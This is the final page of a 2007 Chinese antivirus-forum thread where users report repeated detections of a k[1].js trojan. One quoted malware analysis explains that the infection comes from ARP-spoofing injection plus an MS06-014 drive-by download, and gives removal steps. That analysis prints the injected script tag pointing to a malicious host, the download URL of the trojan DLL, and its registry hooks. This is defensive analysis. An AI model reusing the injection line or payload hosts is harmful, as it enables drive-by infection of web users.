病毒Trojan.DL.VBS.Agent.cpb（K[1].JS）重复出现，问题重要！技术员来看

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛病毒Trojan.DL.VBS.Agent.cpb（K[1].JS）重复出现，问题重要！技术员来看

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1 2 3 4 56

6 / 6 页

跳转页

病毒Trojan.DL.VBS.Agent.cpb（K[1].JS）重复出现，问题重要！技术员来看

无名deしovの初生襁褓狮帖子:38 注册: 2006-09-07 来自:	发表于： 2007-06-07 18:18 \| 只看楼主短消息资料字号：小中大 51楼去http://www.antiarp.com/下载arp防火墙，可以防止这个病毒。呵呵，我正在用，觉得还可以！
无名deしovの初生襁褓狮帖子:38 注册: 2006-09-07 来自:

无名deしovの初生襁褓狮帖子:38 注册: 2006-09-07 来自:	发表于： 2007-06-07 19:56 \| 只看楼主短消息资料字号：小中大 52楼希望瑞星防火墙有防止arp病毒的功能
无名deしovの初生襁褓狮帖子:38 注册: 2006-09-07 来自:

szpig2001 初生襁褓狮帖子:13 注册: 2007-06-02 来自:	发表于： 2007-06-07 22:23 \| 短消息资料字号：小中大 53楼 up 我的机子也有这样的情况。。但不是K。JS 是W[1]。JS。。。情况完全和你们说的一样。。
szpig2001 初生襁褓狮帖子:13 注册: 2007-06-02 来自:

卜氏好人初生襁褓狮帖子:2 注册: 2007-06-07 来自:	发表于： 2007-06-08 09:32 \| 短消息资料字号：小中大 54楼瑞星的技术人员是吃干饭的？咋还不解决？？？？这玩意快把人烦死了！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！
卜氏好人初生襁褓狮帖子:2 注册: 2007-06-07 来自:

joseph08 初生襁褓狮帖子:3 注册: 2007-06-08 来自:	发表于： 2007-06-08 11:06 \| 短消息资料字号：小中大 55楼我的机子也有这样的情况。。但不是K。JS 是W[1]。JS。。。情况完全和你们说的一样。。前天中了这个病毒，卸载IE，安全模式下杀毒解决了。昨天又中了，以上方法无效了，重装系统无效，以上各位提供的软件全部用过了，还是无效。到底该怎么解决阿，昨天折腾到3点，到底该怎么解决阿？
joseph08 初生襁褓狮帖子:3 注册: 2007-06-08 来自:

joseph08 初生襁褓狮帖子:3 注册: 2007-06-08 来自:	发表于： 2007-06-08 13:14 \| 短消息资料字号：小中大 56楼本病毒：Trojan.DL.VBS.Agent.cpb （文件名为k[1].js)老是在internet临时文件里出现，瑞星监控出杀了又来，如此反复着！我试图清空临时文件，但一上网打开网页（不管是哪些网页），那个k[1].js又会被瑞星监控到。
joseph08 初生襁褓狮帖子:3 注册: 2007-06-08 来自:

初生襁褓狮

帖子:1
注册: 2007-06-08
来自:

发表于： 2007-06-08 14:45 | 短消息资料

字号：小中大 57楼

http://www.ccw.com.cn/soft/apply/htm2007/20070529_265239_3.shtml

引用:

【轩辕小聪的贴子】本来想午睡的，看来这个情况是睡不了了。
该网页利用MS06-014漏洞，下载http://day.91tg.net/xp.dll到C:\WINDOWS\winhelp.dll，并直接写入注册表
HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}
指向C:\WINDOWS\winhelp.dll

由于瑞星查杀了k.js，一般情况下大家是不会中毒的。但是之所以重复出现k.js的报毒，原因是：
局域网中有电脑中了此毒，然后向局域网中其他电脑发动ARP攻击，将其他用户接收到的网络数据包中加入
<script src="http://k.sb941.com/k.js" type="text/javascript"></script>
的代码，导致其他用户访问任何网站时都会报毒。

所以，首先，确认你的电脑是否中毒：
确认以下注册表路径是否存在：
[HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
如果存在，尝试在安全模式下删除这两个注册表路径。

如果不存在，说明不是你本机的中毒问题，而是你受到ARP攻击的缘故。
这种情况下，请联系局域网网管进行协调处理。必须找到中毒并进行ARP欺骗的电脑，然后将其断网查毒。

对于客户端上网流程和“网页挂马”的几种方式分析可参考

其中所提到的：
攻击点：1.在客户端（网民）主机或网络中发送攻击代码，比如ARP攻击，插入恶意代码，诱使用户访问攻击者指定的站点，这时会影响该客户端或其所在的网络
正是本帖用户所面临的情况。

………………

gwlucker 快乐黄口狮帖子:202 注册: 2006-10-06 来自:	发表于： 2007-06-08 15:15 \| 短消息资料字号：小中大 58楼这里是社区又不是瑞星技术支持部的论坛.... 帮大家解决问题的都是热心的网友.说扫SRG日志咋没一个人扫了发上来大家看看呢？电脑的问题不是光说就能说明白的
gwlucker 快乐黄口狮帖子:202 注册: 2006-10-06 来自:

<<上一主题|下一主题>>

1 2 3 4 56

6 / 6 页

跳转页

瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 病毒Trojan.DL.VBS.Agent.cpb（K[1].JS）重复出现，问题重要！技术员来看

病毒Trojan.DL.VBS.Agent.cpb（K[1].JS）重复出现，问题重要！技术员来看

瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛病毒Trojan.DL.VBS.Agent.cpb（K[1].JS）重复出现，问题重要！技术员来看